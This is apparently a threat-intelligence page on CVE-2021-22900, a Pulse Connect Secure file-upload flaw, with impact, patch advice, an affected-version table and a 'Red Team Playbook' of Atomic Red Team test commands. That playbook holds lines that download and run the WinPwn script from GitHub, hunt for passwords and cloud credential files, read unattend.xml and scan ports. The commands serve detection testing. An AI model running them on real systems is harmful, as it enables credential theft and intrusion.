CVE-2021-22900
Overview
This vulnerability is an unrestricted file upload flaw rooted in insufficient validation of archive contents within the administrator web interface of Pulse Connect Secure. Specifically, the affected component improperly handles multiple file uploads embedded in maliciously crafted archive files, allowing authenticated administrators to write arbitrary files on the system. The flaw arises from inadequate sanitization and verification of archive payloads prior to extraction and storage.
Vulnerability Description
A vulnerability allowed multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 that could lead to an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.
Impact
An attacker with authenticated administrator credentials can exploit this vulnerability to write arbitrary files on the Pulse Connect Secure server, potentially leading to remote code execution or persistent system compromise. This capability enables the attacker to modify system configurations, implant backdoors, or disrupt service operations. The prerequisite is possession of valid administrator-level access, which may be obtained through credential compromise or insider threat. Successful exploitation can result in full system compromise and lateral movement within the affected network environment.
Solution
Ivanti released security advisory SA44784 addressing this issue and recommends upgrading Pulse Connect Secure to version 9.1R11.4 or later. Administrators should apply the provided patches as detailed in the advisory at https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/. No specific workarounds are noted; timely patching is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Pulse Connect Secure arises from improper handling of file uploads, specifically allowing multiple unrestricted uploads through the administrator web interface. This flaw permits an authenticated administrator to upload maliciously crafted archive files, which could lead to unauthorized file writes on the server. The lack of adequate validation and restrictions on the types of files that can be uploaded creates a significant security risk, as attackers could exploit this weakness to execute arbitrary code or manipulate server files, potentially compromising the entire system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with administrative access could leverage this flaw to upload a specially crafted archive file containing malicious scripts or executables. Once uploaded, these files could be executed on the server, allowing the attacker to gain control over the system, exfiltrate sensitive data, or disrupt services. Additionally, if the attacker can escalate privileges or gain access to other administrative accounts, the impact could be even more severe, leading to a complete compromise of the network environment.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on Pulse Connect Secure for secure remote access. The potential for unauthorized file writes could lead to data breaches, loss of sensitive information, and disruption of critical services. Moreover, the exploitation of this vulnerability could result in compliance violations, particularly for organizations in regulated industries such as finance and healthcare. The reputational damage from a successful attack could also lead to a loss of customer trust and confidence, further exacerbating the business risks associated with this vulnerability.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and penetration testing can help identify potential weaknesses in the system, while monitoring for unusual file upload patterns can provide early warning signs of exploitation attempts. Additionally, organizations should enforce strict access controls, ensuring that only trusted administrators have the ability to upload files. Implementing file type restrictions and validating the contents of uploaded files can further reduce the risk of exploitation. Keeping the Pulse Connect Secure software up to date with the latest security patches is essential to protect against known vulnerabilities.
In conclusion, the vulnerability in Pulse Connect Secure represents a serious threat to organizations that utilize this product for secure remote access. The ability for authenticated administrators to perform unrestricted file uploads without adequate validation poses significant risks, including potential data breaches and operational disruptions. By adopting proactive detection and mitigation strategies, organizations can better safeguard their systems against exploitation and minimize the associated business risks.
CSURFACE threat intelligence has identified a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-22900, reflecting a significant increase in the likelihood of exploitation attempts. The EPSS score has surged by over two hundred percent, indicating that this vulnerability is gaining traction within attacker communities. Although no new exploit techniques or ransomware affiliations have been confirmed, the rapid upward trend in exploitation probability signals heightened adversary interest and potential preparatory activity. This development elevates the urgency for defenders to reassess their exposure, as the increased EPSS score correlates with a greater risk of targeted attacks leveraging unrestricted file upload capabilities in Pulse Connect Secure. Consequently, the threat level associated with this vulnerability should be considered more severe than previously assessed, underscoring the necessity for vigilant monitoring and timely response to emerging exploitation indicators.
Affected Products (41)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r1.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r2.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r3.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r4.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r5.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.0 |
cpe:2.3:a:ivanti:connect_secure:9.0:r6.0:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 9.1 |
cpe:2.3:a:ivanti:connect_secure:9.1:r10.0:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22900 |
| kb.pulsesecure.net |
GitHub CVE
x_refsource_MISC
|
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22900 |